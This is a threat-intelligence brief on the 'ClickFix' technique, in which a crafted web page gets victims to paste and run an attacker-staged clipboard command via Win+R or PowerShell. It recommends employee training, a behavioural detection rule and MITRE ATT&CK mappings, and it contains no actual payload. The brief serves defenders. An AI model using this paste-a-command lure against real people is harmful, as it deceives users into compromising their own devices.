INTEL-18: ClickFix: When the User Becomes the Exploit

The INTEL  

ClickFix became the malware proliferation method of choice in 2025 — and it bypasses nearly every technical email control you’ve paid for.

Intel 471 tracks ClickFix as the dominant delivery pattern of 2025. The mechanic is almost insultingly simple:

1. A victim lands on a crafted page (often via malvertising, SEO poisoning, or a fake verification overlay).
2. The page instructs them to press Win+R → Ctrl+V → Enter — or the equivalent sequence in PowerShell or Terminal.
3. The command they just pasted — pre-staged by the attacker on their clipboard — runs with the user’s privileges, in their session, on their device.

There is no malicious attachment for your sandbox to detonate. No malicious URL for your filter to block — the URL being visited is the attacker’s page, but the payload arrives through the user’s own hands. Every technical email control becomes irrelevant at the moment the user follows instructions.

The underground-market pricing confirms it has industrialized: full ClickFix phishing kits trade at $1,500–$2,000 per page, with named vendors advertising tailored variants for cracked-software lures, Cloudflare-themed overlays, and multilingual targeting. This is a product, not a novel technique.

Traditional phishing tells — typos, odd tone, mismatched domains — don’t apply. The victim isn’t being deceived about who sent an email. They’re being given a plausible technical instruction and asked to execute it themselves.

Why It Matters  

ClickFix flips the detection surface. Email security, web gateways, URL reputation, and attachment sandboxing are all upstream of the compromise event. The compromise happens when the user pastes a string into Run, PowerShell, or Terminal — which is a legitimate action that security tooling is not designed to block.

This isn’t a filter problem. It’s a training problem and a behavioral-detection problem — and it has a cleaner decision point than any phishing variant in the last decade. There is exactly one sentence between your employees and a ClickFix infection, and most of your workforce has never heard it.

What To Do — One Key Action  

Teach one line, everywhere, this quarter:

“No legitimate website, IT team, or CAPTCHA ever asks me to paste a command into Run, PowerShell, or my terminal. If I’m being asked to do that, I stop and report it.”

Ship it as a 60-second briefing — no LMS module required. Include it in onboarding. Put it on the back of the badge. Then back it with a behavioral detection: alert on unusual clipboard → Run (Win+R) → cmd/powershell execution patterns, especially from non-developer endpoints. Most EDR vendors support this now; most organizations haven’t turned it on.

One sentence. One detection. It closes the dominant 2025 delivery method.

MITRE ATT&CK  

• T1204.004 — User Execution: Malicious Copy and Paste: Primary technique — user is socially engineered into pasting attacker-staged commands
• T1059.001 — Command and Scripting Interpreter: PowerShell: Most common execution path once the command is pasted
• T1059.003 — Command and Scripting Interpreter: Windows Command Shell: Secondary execution path via Run → cmd.exe
• T1204.001 — User Execution: Malicious Link: The upstream delivery — malvertising or SEO-poisoned lure pages

Learn More  

• Intel 471 — 2026 Cyber Threat Trends & Outlook Report — Primary source
• FIR Risk Tuesday E88 — The Trust Audit — Full dual-report analysis
• FIR Risk INTEL-5 — Microsoft Identity Trust Exploitation — Related trust-surface abuse
• FIR Risk INTEL-8 — Voice Phishing Surge — Related social-engineering delivery

Powered by FIR Risk Platform — AI-driven threat intelligence for enterprise risk leaders.